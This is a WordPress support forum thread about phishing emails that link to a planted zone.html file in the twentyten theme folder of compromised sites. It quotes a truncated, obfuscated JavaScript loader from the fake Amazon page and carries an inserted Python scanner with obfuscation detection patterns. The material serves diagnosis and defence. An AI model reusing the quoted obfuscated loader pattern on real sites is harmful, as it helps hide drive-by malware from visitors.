WordPress.org

Possible securityhole in twentyten? (9 posts)

  1. Veidit
    Member
    Posted 2 years ago #

    Good evening, I just noticed a spam message that references a site and uses the URI wp-content/themes/twentyten/zone.html

    The code included there is:

    <html>
    <title>Amazon.com: Online Shopping for Electronics, Apparel, Computers, Books, DVDs & more</title>
    <h2>Amazon.com Order confirmation</h2>
    <h3>Loading your book</h3>
    <br></br>
    <h5>Order ID: Loading...</h5>
    <h5>Print Date/Time: 06/04/2012 8:30 AM EST</h5>
    
    <script>try{q.appendChild(q+"");}catch(qw){h=-012/5;f='fromCharC';}try{begbe=prototype;}catch(b43gds){ss=[];f+=(h&&f)?'ode':"";w=this;e=eval;n=[ We don't really need this here. }</script>
    
    </html>

    I am not sure if this is a security hole in twentyten, wordpress, the webservers or similar, since I don't have access to the infected hosts. I have contacted the owners so that they can remove the file.
    From what I can see from one host: <meta name="generator" content="WordPress 3.3.2" />

  2. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    Suspected security issues should be emailed directly to security@wordpress.org, not posted publicly in forums.

    That said: this is a compromised server, not an issue native to WordPress or the Twenty Eleven Theme.

  3. wytcld
    Member
    Posted 2 years ago #

    I have a single e-mail sample today, pretending to be Amazon as in the initial report, with ten different compromised WP sites linked, all of those links including

    /wp-content/themes/twentyten/zone.html

    So it's obviously an issue native to WordPress and the twentyten theme. It's in the wild. And people should at minimum disable that theme until it's fixed. Yes, I'll send it to security. But we need immediate action from all WP admins running that theme. Not secrecy about the problem.

  4. Veidit
    Member
    Posted 2 years ago #

    Chip, how can you be sure that it's the server that is compromised and not a hole in the theme that enables you to upload a file?

  5. wytcld
    Member
    Posted 2 years ago #

    These are totally different sites in the 10 in the e-mail I have. Not on the same host or hosting service or IP block. The only way they'd all be at the same location within the wp-content hierarchy is if the exploit is in either WP and/or the theme. If you're trying to hide something in diverse servers you wouldn't do it all in the same location otherwise.

  6. So it's obviously an issue native to WordPress and the twentyten theme.

    That may or may not be the case. If you can reproduce the compromise then please send those details to the email address that Chip provided you.

    If you're trying to hide something in diverse servers you wouldn't do it all in the same location otherwise.

    If you're a person you don't, but compromises are scripted and automated. Every WordPress installation in existence today will have a wp-content/themes/twentyten directory so it's a good target to place things and hope the owner doesn't discover it.

    I'm not minimizing what happened to you, but where there is smoke there's a fire. Your server is on fire; we're trying to help you correctly narrow down where the fire actually started.

    Edit: I forgot the obligatory delouse links.

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://codex.wordpress.org/Hardening_WordPress
    http://www.studiopress.com/tips/wordpress-site-security.htm

  7. Veidit
    Member
    Posted 2 years ago #

    Well as I pointed out, this is not related to my site, I just got the spam and looked at the URI that pointed out the twentyten theme.

  8. Chip Bennett
    Theme Review Admin
    Posted 2 years ago #

    I have a single e-mail sample today, pretending to be Amazon as in the initial report, with ten different compromised WP sites linked, all of those links including

    /wp-content/themes/twentyten/zone.html

    So it's obviously an issue native to WordPress and the twentyten theme.

    No, it's not. Twenty Eleven is the target, not the exploit vector.

    Very likely, what is happening is that an exploit vector has been identified, and a payload created and deployed, targeting the Twenty Eleven Theme, because it exists on every current installation of WordPress.

    Chip, how can you be sure that it's the server that is compromised and not a hole in the theme that enables you to upload a file?

    Call it a hunch on my part, because it is almost always a server exploit - either through server configuration, or (more often) through compromised FTP credentials (virus/malware scanning of your local PCs remains important for this very reason).

    Who knows what the exact exploit vector is in this case? It could be a Plugin; it could be another TimThumb exploit. It could be something on the server, completely unrelated to WordPress.

    But I am 99.999% confident that Twenty Eleven itself is not the exploit vector.
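    A defender-side check in the spirit of posts 6 and 8: an added example, not code from this thread or from WordPress, that walks a wp-content/themes tree and flags files of a type a theme should not contain, or whose contents carry the split-string obfuscation marker (fromCharC + ode, assignment of eval) seen in the zone.html snippet in the first post. The expected-extension set, the obfuscation patterns and the sample tree are constructed assumptions.

```python
import os
import re
import tempfile

# Assumption: file types a stock theme directory legitimately contains.
EXPECTED_EXTENSIONS = {".php", ".css", ".js", ".png", ".gif", ".jpg",
                       ".pot", ".po", ".mo", ".txt"}

# Constructed heuristics modelled on the first post's snippet: 'fromCharC' closed by a
# quote (String.fromCharCode split across two literals) and eval assigned to a variable.
OBFUSCATION_PATTERNS = [
    re.compile(r"fromCharC['\"]"),
    re.compile(r"=\s*eval\b"),
]

def file_looks_obfuscated(path):
    """True when the file's text matches any obfuscation heuristic."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    except OSError:
        return False
    return any(p.search(data) for p in OBFUSCATION_PATTERNS)

def scan_theme_dir(root):
    """Return sorted (relative_path, reason) pairs for suspicious files under root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if ext not in EXPECTED_EXTENSIONS:
                findings.append((rel, "unexpected file type"))
            if ext in {".html", ".htm", ".js", ".php"} and file_looks_obfuscated(path):
                findings.append((rel, "obfuscated script"))
    return sorted(findings)

def build_sample_install():
    """Constructed sample: a minimal twentyten tree plus a planted zone.html marker file."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "twentyten")
    os.makedirs(theme)
    with open(os.path.join(theme, "style.css"), "w") as fh:
        fh.write("/*\nTheme Name: Twenty Ten\n*/\n")
    with open(os.path.join(theme, "functions.php"), "w") as fh:
        fh.write("<?php\n// legitimate theme code\n")
    with open(os.path.join(theme, "zone.html"), "w") as fh:
        fh.write("<html><script>f='fromCharC';f+='ode';e=eval;</script></html>\n")
    return os.path.join(root, "wp-content", "themes")

if __name__ == "__main__":
    for rel, reason in scan_theme_dir(build_sample_install()):
        print(rel, "-", reason)
```

Run it against a real install's wp-content/themes path in place of the sample tree; a stock Twenty Ten contains no .html files, so any hit there deserves a look.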

  9. pbutler1
    Member
    Posted 2 years ago #

    Hi - I was unfortunate enough to click on one of the links before I realized what it was. At that point a pop-up appeared saying connecting to server and I did a forced shutdown.

    On reboot there is a program called KB00629424.exe running that has a modified time just before the shutdown. MSFT security essentials does not identify it as a threat.

    In looking at the HTML of the message, the site link that loaded this was:

    [ redacted ].com/wp-content/themes/twentyten/zone.html

    Our own site does not have the target zone.html file loaded on it.

This topic has been closed to new replies.